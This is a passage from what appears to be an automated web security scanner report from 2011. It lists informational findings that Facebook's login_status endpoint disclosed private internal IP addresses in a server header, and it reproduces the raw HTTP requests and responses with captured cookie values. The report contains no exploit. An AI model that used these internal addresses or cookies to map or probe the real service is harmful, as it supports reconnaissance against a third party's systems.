nt%26transport%3Dpostmessage%26frame%3Df77cf04&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df39c51df98%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff79b6de9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df77cf04&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=facdd34b&origin=http%3A%2F%2Faol.sportingnews.com%2Ff79b6de9c&relation=parent&transport=postmessage&frame=f77cf04
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.53.27
X-Cnection: close
Date: Thu, 05 May 2011 01:48:44 GMT
Content-Length: 0

20.134. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.75.41

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d02d1918%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b28476fc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df244daaf6%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b28476fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a91f628%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1fb037e54%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b28476fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a91f628&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1fcb5d4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b28476fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a91f628&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3ae5faab%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b28476fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a91f628&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1fcb5d4&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3b28476fc&relation=parent&transport=postmessage&frame=f1a91f628
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.75.41
X-Cnection: close
Date: Thu, 05 May 2011 01:50:18 GMT
Content-Length: 0

20.135. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.155.48

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df28a29b0ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8e71479%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df35de660e%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8e71479%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a2894a34%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df17a21e508%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8e71479%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a2894a34&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df293a15c18%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8e71479%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a2894a34&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df161ef1454%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8e71479%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a2894a34&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f293a15c18&origin=http%3A%2F%2Faol.sportingnews.com%2Ff8e71479&relation=parent&transport=postmessage&frame=f2a2894a34
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.155.48
X-Cnection: close
Date: Thu, 05 May 2011 01:34:47 GMT
Content-Length: 0

20.136. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.81.41

Request

GET /extern/login_status.php?api_key=2431184420&app_id=2431184420&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df34592c72%26origin%3Dhttp%253A%252F%252Fwww.citysbest.com%252Ff1558e56e4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3dc7d085%26origin%3Dhttp%253A%252F%252Fwww.citysbest.com%252Ff1558e56e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c2391e1c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2e9a2d398%26origin%3Dhttp%253A%252F%252Fwww.citysbest.com%252Ff1558e56e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c2391e1c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f169a45c%26origin%3Dhttp%253A%252F%252Fwww.citysbest.com%252Ff1558e56e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c2391e1c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2845949c%26origin%3Dhttp%253A%252F%252Fwww.citysbest.com%252Ff1558e56e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c2391e1c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1f169a45c&origin=http%3A%2F%2Fwww.citysbest.com%2Ff1558e56e4&relation=parent&transport=postmessage&frame=f3c2391e1c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.81.41
X-Cnection: close
Date: Thu, 05 May 2011 00:58:24 GMT
Content-Length: 0

20.137. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.104.125

Request

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f38b20c288&origin=http%3A%2F%2Fwww.truveo.com%2Ff192839764&relation=parent&transport=postmessage&frame=f11f5dcd84
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.104.125
X-Cnection: close
Date: Thu, 05 May 2011 01:09:56 GMT
Content-Length: 0

20.138. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.189.73

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc47623d8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff154677df%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1db8869fc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff154677df%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff9c12348%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df32fc44f88%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff154677df%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff9c12348&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df164452bc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff154677df%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff9c12348&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df22c13e9ec%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff154677df%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff9c12348&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f164452bc&origin=http%3A%2F%2Faol.sportingnews.com%2Ff154677df&relation=parent&transport=postmessage&frame=ff9c12348
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.189.73
X-Cnection: close
Date: Thu, 05 May 2011 02:11:06 GMT
Content-Length: 0

20.139. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.91.77

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3fbffbfc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff4ba24b8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df120ad6008%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff4ba24b8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a1672294%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df74afbf1%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff4ba24b8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a1672294&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df21669b4d4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff4ba24b8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a1672294&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f2795bbc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff4ba24b8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a1672294&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f21669b4d4&origin=http%3A%2F%2Faol.sportingnews.com%2Ff4ba24b8&relation=parent&transport=postmessage&frame=f2a1672294
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.91.77
X-Cnection: close
Date: Thu, 05 May 2011 01:51:30 GMT
Content-Length: 0

20.140. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.235.25

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1150e2cb%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3193e22c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37f70eb8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3193e22c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b3af62bc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3310325ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3193e22c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b3af62bc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12f94ebd4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3193e22c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b3af62bc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1909607f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3193e22c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b3af62bc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f12f94ebd4&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3193e22c&relation=parent&transport=postmessage&frame=f3b3af62bc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.235.25
X-Cnection: close
Date: Thu, 05 May 2011 01:45:56 GMT
Content-Length: 0

20.141. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.96.57

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df32ecfb254%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1c4f82c7%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f3da472%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1c4f82c7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df285c04e38%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1db47379c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1c4f82c7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df285c04e38&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df29b286be8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1c4f82c7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df285c04e38&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12f83208c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1c4f82c7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df285c04e38&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f29b286be8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1c4f82c7&relation=parent&transport=postmessage&frame=f285c04e38
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.96.57
X-Cnection: close
Date: Thu, 05 May 2011 01:21:05 GMT
Content-Length: 0

20.142. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.170.50

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1cfff3088%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3131d8214%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8d36d1c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3131d8214%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ecaddae%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df28e8c7a84%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3131d8214%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ecaddae&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df16e298c6c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3131d8214%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ecaddae&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df21fa44b14%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3131d8214%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ecaddae&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f16e298c6c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3131d8214&relation=parent&transport=postmessage&frame=f3ecaddae
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.170.50
X-Cnection: close
Date: Thu, 05 May 2011 01:30:35 GMT
Content-Length: 0

20.143. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.68.33

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3cabb93c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff14c209fd%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2e88af65%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff14c209fd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5a2f5d4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2776b41cc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff14c209fd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5a2f5d4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1ac84726c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff14c209fd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5a2f5d4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df366503768%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff14c209fd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5a2f5d4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
